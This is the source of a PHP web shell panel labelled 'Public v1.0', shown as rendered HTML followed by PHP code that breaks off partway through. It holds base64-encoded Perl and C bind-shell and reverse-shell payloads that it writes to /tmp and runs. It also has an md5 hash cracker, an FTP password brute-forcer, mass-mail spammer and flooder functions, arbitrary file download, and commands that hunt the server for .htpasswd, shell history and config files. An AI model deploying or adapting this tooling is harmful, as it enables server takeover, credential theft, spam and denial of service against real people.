var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
var len = str.length;
do
{
chr1 = str.charCodeAt(i++);
chr2 = str.charCodeAt(i++);
chr3 = str.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 0x03) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 0x0F) << 2) | (chr3 >> 6);
enc4 = chr3 & 0x3F;
out += charBase64[enc1] + charBase64[enc2];
if (isNaN(chr2))
{
out += '==';
}
else if (isNaN(chr3))
{
out += charBase64[enc3] + '=';
}
else
{
out += charBase64[enc3] + charBase64[enc4];
}
}
while (i < len);
return out;
}
function base64Decode(str)
{
var indexBase64 = new Array(
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,62, -1,-1,-1,63,
52,53,54,55, 56,57,58,59, 60,61,-1,-1, -1,-1,-1,-1,
-1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,10, 11,12,13,14,
15,16,17,18, 19,20,21,22, 23,24,25,-1, -1,-1,-1,-1,
-1,26,27,28, 29,30,31,32, 33,34,35,36, 37,38,39,40,
41,42,43,44, 45,46,47,48, 49,50,51,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1
);
var out = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
str = str.replace(/^[^a-zA-Z0-9\+\/\=]+|[^a-zA-Z0-9\+\/\=]+$/g,"")
var len = str.length;
do
{
enc1 = indexBase64[str.charCodeAt(i++)];
enc2 = indexBase64[str.charCodeAt(i++)];
enc3 = indexBase64[str.charCodeAt(i++)];
enc4 = indexBase64[str.charCodeAt(i++)];
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
out += String.fromCharCode(chr1);
if (enc3 != -1)
{
out += String.fromCharCode(chr2);
}
if (enc4 != -1)
{
out += String.fromCharCode(chr3);
}
}
while (i < len);
if (i != len)
{
new Error(BASE64_BROKEN);
return "";
}
return out;
}
</script>
<td valign="top" align="left" width="50%">
<form action="" method="POST">
<table width="100%" height="100%" valign="top" class="td2">
<tbody><tr><td width="1%">
<b>.::Base64_encode::.</b>
</td><td align="right" width="6%">
<input type="button" value="encode" class="bt" onclick="t.value=base64Encode(t.value)">
</td>
<td width="1%">
<b>.::Base64_decode::.</b>
</td><td align="right" width="6%">
<input type="button" value="decode" class="bt" onclick="n.value=base64Decode(n.value)">
</td></tr>
<tr><td colspan="2">
<input type="text" name="t" class="ta" size="34">
</td><td colspan="2">
<input type="text" name="n" class="ta" size="34">
</td></tr>
</tbody></table></form>
</td></tr>
</tbody></table>
</td></tr><tr></tr><tr><td>
<table cellpadding="0" cellspacing="0"><tbody><tr><td>
<table class="td1" width="226">
<tbody><tr><td width="100%" class="td2">
<form action="" method="POST">
<table cellpadding="0" cellspacing="0" width="90%" border="0"><tbody><tr><td colspan="3">
<b>.::Back Connect::.</b></td></tr>
<tr><td width="100%" height="10" colspan="3"></td></tr>
<tr><td width="25%" align="right"><font color="#888888" size="2"><b>IP:</b></font></td>
<td width="5%"></td>
<td width="100%" align="right">
<input type="text" class="ta" name="ip" size="15" value="::1"></td></tr>
<tr><td width="100%" height="5" colspan="3"></td></tr>
<tr><td width="25%" align="right"><font color="#888888" size="2">port:</font></td>
<td width="5%"></td>
<td width="100%" align="right">
<input type="text" class="ta" name="port" size="10" value="5000"></td></tr>
<tr><td width="100%" height="5" colspan="3"></td></tr>
<tr><td width="25%" align="right"><font color="#888888" size="2">Method:</font></td>
<td width="5%"></td>
<td width="100%" align="right">
<select class="ta" name="method">
<option>Perl</option>
<option>C#</option>
<option>---------------------</option>
</select></td></tr>
<tr><td width="100%" height="5" colspan="3"></td></tr>
<tr><td width="100%" align="right" colspan="3">
<input type="hidden" name="type" value="12">
<input type="submit" value="Connect" class="bt">
</td></tr><tr><td width="100%" height="5" colspan="3"></td></tr>
</tbody></table>
</form></td></tr>
</tbody></table>
</td><td width="5"></td><td>
<table class="td1" width="226">
<tbody><tr><td width="100%" class="td2">
<form action="" method="POST">
<table cellpadding="0" cellspacing="0" width="90%" border="0"><tbody><tr><td colspan="3">
<b>.::Bind port::.</b></td></tr>
<tr><td width="100%" height="10" colspan="3"></td></tr>
<tr><td width="25%" align="right"><font color="#888888" size="2"><b>Port:</b></font></td>
<td width="5%"></td>
<td width="100%" align="right">
<input type="text" class="ta" name="port" size="15" value="6000"></td></tr>
<tr><td width="100%" height="5" colspan="3"></td></tr>
<tr><td width="25%" align="right"><font color="#888888" size="2">pass:</font></td>
<td width="5%"></td>
<td width="100%" align="right">
<input type="text" class="ta" name="pass" size="10" value="hshell"></td></tr>
<tr><td width="100%" height="5" colspan="3"></td></tr>
<tr><td width="25%" align="right"><font color="#888888" size="2">Method:</font></td>
<td width="5%"></td>
<td width="100%" align="right">
<select class="ta" name="method">
<option>Perl</option>
<option>C#</option>
<option>---------------------</option>
</select></td></tr>
<tr><td width="100%" height="5" colspan="3"></td></tr>
<tr><td width="100%" align="right" colspan="3">
<input type="hidden" name="type" value="12">
<input type="submit" value="Bind" class="bt">
</td></tr><tr><td width="100%" height="5" colspan="3"></td></tr>
</tbody></table>
</form></td></tr>
</tbody></table>
</td><td width="5"></td><td width="50%" height="141">
<table class="td1" width="100%" height="100%" valign="top"><tbody><tr><td width="100%" height="100%" class="td2" valign="top">
<table cellpadding="0" cellspacing="0" width="95%"><tbody><tr><td colspan="4">
<b>.::md5 bruter::.</b>
</td></tr><tr><td height="10"></td></tr>
<tr><td width="20"></td><td>
<font size="2" color="#888888" align="right"><b>hash:</b></font></td><td width="5"></td><td align="right">
<input type="text" name="hash" class="ta" size="50">
</td></tr>
<tr><td height="5"></td>
</tr><tr><td width="20"></td><td>
<font size="2" color="#888888" align="right">log_file:</font></td><td width="5"></td><td align="right">
<input type="text" name="log" class="ta" size="30" value="md5_log.txt">
</td></tr>
<tr><td height="5"></td>
</tr><tr><td width="20"></td><td>
<font size="2" color="#888888" align="right">dictionary_file:</font></td><td width="5"></td><td align="right">
<input type="text" name="dict" class="ta" size="30" value="md5_dict.txt">
</td></tr>
<tr><td height="5"></td>
</tr><tr><td width="20"></td><td>
</td><td width="5"></td><td align="right">
<input type="submit" class="bt" value="Start Brute">
</td></tr>
</tbody></table>
</td></tr></tbody></table>
</td></tr></tbody></table>
</td></tr><tr></tr><tr><td>
<table class="td1" width="100%" height="310" valign="top" align="left">
<form action="" method="POST"></form>
<tbody><tr><td valign="top" align="left" class="td2" width="33%">
<table cellpadding="0" cellspacing="0" width="100%">
<tbody><tr><td valign="top" colspan="3" height="30">
<b>.::Spammer::.</b>
</td></tr><tr><td width="25%" align="right">
<font color="#888888" size="2"><b>emails_file:</b></font>
</td><td width="65%" align="right">
<input type="text" name="elist" class="ta" size="17" value="emails.txt">
</td></tr><tr><td height="5"></td></tr>
<tr><td width="25%" align="right">
<font color="#888888" size="2"><b>log_file:</b></font>
</td><td width="65%" align="right">
<input type="text" name="log" class="ta" size="17" value="mail_log.txt">
</td></tr>
<tr><td height="5"></td><td></td></tr>
<tr><td width="25%" align="right">
<font color="#888888" size="2">From:</font>
</td><td width="65%" align="right">
<input type="text" name="from" class="ta" size="27">
</td></tr>
<tr><td height="5"></td><td></td></tr>
<tr><td width="25%" align="right">
<font color="#888888" size="2">Subject:</font>
</td><td width="65%" align="right">
<input type="text" name="subject" class="ta" size="27">
</td></tr>
<tr><td height="5"></td><td></td></tr>
<tr><td width="25%" align="right">
<font color="#888888" size="2">Message:</font>
</td><td width="65%" align="right">
<textarea name="msg" class="ta" cols="20" rows="4"></textarea>
</td></tr>
<tr><td height="5"></td><td></td></tr>
<tr><td width="25%" align="right">
<font color="#888888" size="2">Check<sup>*</sup>:</font>
</td><td width="65%" align="right">
<input type="text" name="check" class="ta" size="27">
</td></tr>
<tr><td height="5"></td><td></td></tr>
<tr><td width="25%" align="right">
</td><td width="65%" align="right">
<input type="submit" class="bt" value="Start">
<input type="hidden" name="type" value="10">
</td></tr>
</tbody></table>
<form action="" method="POST">
</form></td><td valign="top" align="left" class="td2" width="33%">
<table cellpadding="0" cellspacing="0" width="100%">
<tbody><tr><td colspan="3" height="30" valign="top"><b>.::FTP-Brute::.</b></td></tr>
<tr><td width="31%" align="right">
<font color="#888888" size="2"><b>Host:</b></font>
</td><td align="right">
<input type="text" name="host" class="ta" size="28">
</td><td width="5%"></td></tr><tr><td height="35" width="100%" colspan="2"></td></tr>
<tr><td align="right">
<font color="#888888" size="2">ftp_users file:</font>
</td><td align="right">
<input type="text" name="users" class="ta" size="17" value="ftp_users.txt">
</td><td></td></tr>
<tr><td height="5" width="100%" colspan="2"></td></tr>
<tr><td align="right">
<font color="#888888" size="2">ftp_passwd file:</font>
</td><td align="right">
<input type="text" name="passwd" class="ta" size="17" value="ftp_passwds.txt">
</td><td></td></tr>
<tr><td height="5" width="100%" colspan="2"></td></tr>
<tr><td align="right">
<font color="#888888" size="2">ftp_log file:</font>
</td><td align="right">
<input type="text" name="log" class="ta" size="17" value="ftp_log.txt">
</td><td></td></tr>
<tr><td colspan="2" height="20"></td></tr>
<tr><td colspan="2" align="right">
<input type="submit" class="bt" value="Start Brute">
<input type="hidden" name="type" value="9">
</td></tr>
</tbody></table>
<form action="" method="POST">
</form></td><td valign="top" align="left" class="td2" width="33%">
<table cellpadding="0" cellspacing="0" width="100%">
<tbody><tr><td valign="top" colspan="3" height="30">
<b>.::Flooder::.</b>
</td></tr><tr><td width="25%" align="right">
<font color="#888888" size="2"><b>log_file:</b></font>
</td><td width="65%" align="right">
<input type="text" name="log" class="ta" size="17" value="mflood_log.txt">
</td></tr>
<tr><td height="5"></td><td></td></tr>
<tr><td width="25%" align="right">
<font color="#888888" size="2">Send to:</font>
</td><td width="65%" align="right">
<input type="text" name="to" class="ta" size="27">
</td></tr><tr>
<td height="5"></td><td></td></tr>
<tr><td width="25%" align="right">
<font color="#888888" size="2">From:</font>
</td><td width="65%" align="right">
<input type="text" name="from" class="ta" size="27">
</td></tr>
<tr><td height="5"></td><td></td></tr>
<tr><td width="25%" align="right">
<font color="#888888" size="2">Subject:</font>
</td><td width="65%" align="right">
<input type="text" name="subject" class="ta" size="27">
</td></tr>
<tr><td height="5"></td><td></td></tr>
<tr><td width="25%" align="right">
<font color="#888888" size="2">Message:</font>
</td><td width="65%" align="right">
<textarea name="msg" class="ta" cols="20" rows="4"></textarea>
</td></tr>
<tr><td height="25"></td><td></td></tr>
<tr><td width="25%" align="right">
<font color="#888888" size="2">Amount:</font>
</td><td width="65%" align="right">
<input type="text" name="amount" class="ta" size="17">
</td></tr>
<tr><td height="5"></td><td></td></tr>
<tr><td width="25%" align="right">
<font color="#888888" size="2">Check<sup>*</sup>:</font>
</td><td width="65%" align="right">
<input type="text" name="check" class="ta" size="27">
</td></tr>
<tr><td height="5"></td><td></td></tr>
<tr><td width="25%" align="right">
</td><td width="65%" align="right">
<input type="submit" class="bt" value="Flood">
<input type="hidden" name="type" value="10">
</td></tr>
</tbody></table>
</td></tr>
</tbody></table>
</td></tr>
</tbody></table>
</td></tr>
</tbody></table></center>
<center><font size="1" color="#444444">.:[Public v1.0]:.</font></center>
</body></html>Original PHP code
<?php
$auth = 0;
ini_set("session.gc_maxlifetime",1);
session_start();
error_reporting(0);
safe_mode();
$name="9b534ea55d0b82c3a7e80003a84b6865"; //login = 'mylogin'
$pass="a029d0df84eb5549c641e04a9ef389e5"; //pass = 'mypass'
if($auth == 1){
if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || md5($HTTP_SERVER_VARS['PHP_AUTH_USER'])!=$name || md5($HTTP_SERVER_VARS['PHP_AUTH_PW'])!=$pass)
{
header("WWW-Authenticate: Basic realm=\"PanelAccess\"");
header("HTTP/1.0 401 Unauthorized");
exit("Access Denied");
}
}
if($_GET['kill']=='yes')
{
unlink($_SERVER['SCRIPT_FILENAME']);
echo "<script>alert('Your shell script was succefully deleted!')</script>";
}
function md5_brute($hash,$log,$dict)
{
ignore_user_abort(1);
set_time_limit(0);
$fl = fopen($dict, "r");
$fl = fopen($log, "w");
$count = 0;
if(!$dict){
return "Fill 'dictionary_file' field!";
}if(!$log){
return "Fill 'log_file' field!";
}elseif(!strlen($hash) == 0){
return "Fill 'md5_hash' field!";
}else{
while(!$feof($dict)){
$pass = fgets($dict);
$brute_hash = md5($pass);
if($brute_hash == $hash){
fputs($log, "$hash:$pass\n---");
fclose($dict);
fclose($log);
exit;
}else{
$count = $count + 1;
fputs($log, "$count passwords was bruted...");
}
}
fputs($log, "$count passwords are failed!");
}
fclose($dict);
fclose($log);
}
function port_bind($port,$pass,$method)
{
$perl = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
lIENPTk47DQpleGl0IDA7DQp9DQp9";
$c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
if($method=='Perl')
{
fputs($i=fopen('/tmp/shlbck','w'),base64_decode($perl));
fclose($i);
ex(which("perl")." /tmp/shlbck ".$port." &");
unlink("/tmp/shlbck");
return ex('ps -aux | grep shlbck');
}
elseif($method=='C#')
{
fputs($i=fopen('/tmp/shlbck.c','w'),base64_decode($c));
fclose($i);
ex("gcc shlbck.c -o shlbck");
unlink('shlbck.c');
ex("/tmp/shlbck ".$port." ".$pass." &");
unlink("/tmp/shlbck");
return ex('ps -aux | grep shlbck');
}else
{
return 'Choose method';
}
}
function backconnect($ip,$port,$method)
{
$perl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
if($method=='Perl')
{
fputs($i=fopen('/tmp/shlbck','w'),base64_decode($perl));
fclose($i);
ex(which("perl")." /tmp/shlbck ".$ip." ".$port." &");
unlink("/tmp/shlbck");
return ex('netstat -an | grep -i listen');
}
elseif($method=='C#')
{
fputs($i=fopen('/tmp/shlbck.c','w'),base64_decode($c));
fclose($i);
ex("gcc shlbck.c -o shlbck");
unlink('shlbck.c');
ex("/tmp/shlbck ".$ip." ".$port." &");
unlink("/tmp/shlbck");
return ex('netstat -an | grep -i listen');
}else
{
return 'Choose method';
}
}
if($_POST['type']==11){download(stripslashes($_POST['value']));};
function download($dfilename)
{
$file=fopen($dfilename,"r");
ob_clean();
$filename = basename($dfilename);
$filedump = fread($file,@filesize($dfilename));
fclose($file);
header("Content-type: ".$mime_type);
header("Content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;
}
function flooder($logf,$to,$from,$subject,$msg,$amount,$check)
{
ignore_user_abort(1);
set_time_limit(0);
$fl = fopen($logf, "w");
$count = 0;
if(!$logf){
return "Fill 'log_file' field!";
}elseif(!$to){
return "Fill 'Send to' field!";
}elseif(!$from){
return "Fill 'From' field!";
}elseif(!$subject){
return "Fill 'Subject' field!";
}elseif(!$msg){
return "Fill 'Message' field!";
}elseif(!$amount){
return "Fill 'Amount' field!";
}else{
while($count < $amount){
mail("$to", "$subject", "$msg", "From: $from");
$count = $count + 1;
$fl = fopen($logf, "w");
fputs($fl, "$count flood-letters was sended...");
fclose($fl);
}
if(strlen($check) != 0){
$check_text = "Done! $count flood-letters was sended!";
$check_sub = 'Check';
mail("$check", "$check_sub", "$check_text", "From: $from");
$fl = fopen($logf, "w");
fputs($fl, "Done! $count flood-letters was sended!");
}
else{
$fl = fopen($logf, "w");
fputs($fl, "Done! $count flood-letters was sended!");
}
}
fclose($fl);
}
function ftp_brute($host,$ftp_users,$ftp_passwd,$ftp_log)
{
ignore_user_abort(1);
set_time_limit(0);
$fl = fopen($ftp_users, "r");
$fd = fopen($ftp_passwd, "r");
$fr = fopen($ftp_log, "a+");
if(!$host){
return "Fill 'Host' field!";
}elseif(!$ftp_users){
return "Fill 'ftp_users file' field!";
}elseif(!$ftp_passwd){
return "Fill 'ftp_passwd file' field!";
}elseif(!$ftp_log){
return "Fill 'ftp_log file' field!";
}elseif(!file_exists($ftp_users)){
return "File ".$ftp_users." doesn't exists!";
}elseif(!file_exists($ftp_passwd)){
return "File ".$ftp_passwd." doesn't exists!";
}
else{
while(!feof($fd)){
$pass = fgets($fd);
while(!feof($fl)){
$user = fgets($fl);
$connect = ftp_connect($host);
if(!$connect){
fputs($fr, "Enable connect to $host\n");
exit;
}else{
$auth = ftp_login($connect, $user, $pass);
if(!$auth){
ftp_quit($connect);
}
else{
fputs($fr, "$host:\n---$login:$pass\n---");
ftp_quit($connect);
}
}
}
}
fputs($fr, "Done:\n");
fclose($fr);
}
fclose($fl);
fclose($fd);
}
function spammer($from,$subject,$msg,$check,$elist,$logf)
{
ignore_user_abort(1);
set_time_limit(0);
$fp = fopen($elist. "r");
$fl = fopen($logf, "w");
$count = 0;
if(!$from){
return "Fill 'From' field!";
}elseif(!$elist){
return "Fill 'Emails list' field!";
}elseif(!$logf){
return "Fill 'Log File' field!";
}elseif(!$msg){
return "Fill 'Message' field!";
}elseif(!$subject){
return "Fill 'Subject' field!";
}elseif(!file_exists($elist)){
return "File ".$elist." doesn't exists!";
}else{
while(!feof($fp)){
$to = fgets($fp);
mail("$to", "$subject", "$msg", "From: $from");
$count = $count + 1;
$fl = fopen($logf, "w");
fputs($fl, "$count letters was sended...");
fclose($fl);
}
if(strlen($check) != 0){
$check_text = "Done! $count letters was sended!";
$check_sub = 'Check';
mail("$check", "$check_sub", "$check_text", "From: $from");
$fl = fopen($logf, "w");
fputs($fl, "Done! $count letters was sended!\n");
}
else{
$fl = fopen($logf, "w");
fputs($fl, "Done! $count letters was sended!");
}
}
fclose($fp);
fclose($fl);
}
function alias($in)
{
if($in=="find apahce config file"){return ex('find / -type f -name httpd.conf');}
elseif($in=="find access_log files"){return ex('find / -type f -name access_log');}
elseif($in=="find error_log files"){return ex('find / -type f -name error_log');}
elseif($in=="find suid files"){return ex('find / -type f -perm -04000 -ls');}
elseif($in=="find suid files in current dir"){return ex('find . -type f -perm -04000 -ls');}
elseif($in=="find sgid files"){return ex('find / -type f -perm -02000 -ls');}
elseif($in=="find sgid files in current dir"){return ex('find . -type f -perm -02000 -ls');}
elseif($in=="find config.inc.php files"){return ex('find / -type f -name config.inc.php');}
elseif($in=="find config.inc.php files in current dir"){return ex('find . -type f -name config.inc.php');}
elseif($in=="find config* files"){return ex('find / -type f -name "config*"');}
elseif($in=="find config* files in current dir"){return ex('find . -type f -name "config*"');}
elseif($in=="find all writable files"){return ex('find / -type f -perm -2 -ls');}
elseif($in=="find all writable files in current dir"){return ex('find . -type f -perm -2 -ls');}
elseif($in=="find all writable directories"){return ex('find / -type d -perm -2 -ls');}
elseif($in=="find all writable directories in current dir"){return ex('find . -type d -perm -2 -ls');}
elseif($in=="find all writable directories and files"){return ex('find / -perm -2 -ls');}
elseif($in=="find all writable directories and files in current dir"){return ex('find . -perm -2 -ls');}
elseif($in=="find all service.pwd files"){return ex('find / -type f -name service.pwd');}
elseif($in=="find service.pwd files in current dir"){return ex('find . -type f -name service.pwd');}
elseif($in=="find all .htpasswd files"){return ex('find / -type f -name .htpasswd');}
elseif($in=="find .htpasswd files in current dir"){return ex('find . -type f -name .htpasswd');}
elseif($in=="find all .bash_history files"){return ex('find / -type f -name .bash_history');}
elseif($in=="find .bash_history files in current dir"){return ex('find . -type f -name .bash_history');}
elseif($in=="find all .mysql_history files"){return ex('find / -type f -name .mysql_history');}
elseif($in=="find .mysql_history files in current dir"){return ex('find . -type f -name .mysql_history');}
elseif($in=="find all .fetchmailrc files"){return ex('find / -type f -name .fetchmailrc');}
elseif($in=="find .fetchmailrc files in current dir"){return ex('find . -type f -name .fetchmailrc');}
elseif($in=="list file attributes on a Linux second extended file system"){return ex('lsattr -va');}
elseif($in=="show opened ports"){return ex('netstat -an | grep -i listen');}
elseif($in=="---------------------------------------------------------------------------------------------------------"){return ex('ls -la');}
}
function testperl()
{
if(ex('perl -h'))
{
return "<font size=2 color=green>ON</font>";
}else{
return "<font size=2 color=red>OFF</font>";
}
}
function testlynx()
{
if(ex('lynx --help'))
{
return "<font size=2 color=green>ON</font>";
}else{
return "<font size=2 color=red>OFF</font>";
}
}
function view_size($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
function testfetch()
{
if(ex('fetch --help'))
{
return "<font size=2 color=green>ON</font>";
}else{
return "<font size=2 color=red>OFF</font>";
}
}
function testwget()
{
if(ex('wget --help'))
{
return "<font size=2 color=green>ON</font>";
}else{
return "<font size=2 color=red>OFF</font>";
}
}
function oracle()
{
if(function_exists('ocilogon'))
{
return "<font size=2 color=green>ON</font>";
}else{
return "<font size=2 color=red>OFF</font>";
}
}
function postgresql()
{
if(function_exists('pg_connect'))
{
return "<font size=2 color=green>ON</font>";
}else{
return "<font size=2 color=red>OFF</font>";
}
}
function testmssql()
{
if(function_exists('mssql_connect'))
{
return "<font size=2 color=green>ON</font>";
}else{
return "<font size=2 color=red>OFF</font>";
}
}
function testcurl()
{
if(function_exists('curl_version'))
{
return "<font size=2 color=green>ON</font>";
}else{
return "<font size=2 color=red>OFF</font>";
}
}
function testmysql()
{
if(function_exists('mysql_connect'))
{
return "<font size=2 color=green>ON</font>";
}else{
return "<font size=2 color=red>OFF</font>";
}
}
function safe_mode()
{
if(!$safe_mode && strpos(ex("echo abch0ld"),"h0ld")!=3)
{
$_SESSION['safe_mode'] = 1;
return "<font size=2 color=green>ON</font>";
}else{
$_SESSION['safe_mode'] = 0;
return "<font size=2 color=red>OFF</font>";
}
};
function ex($in)
{
$out = '';
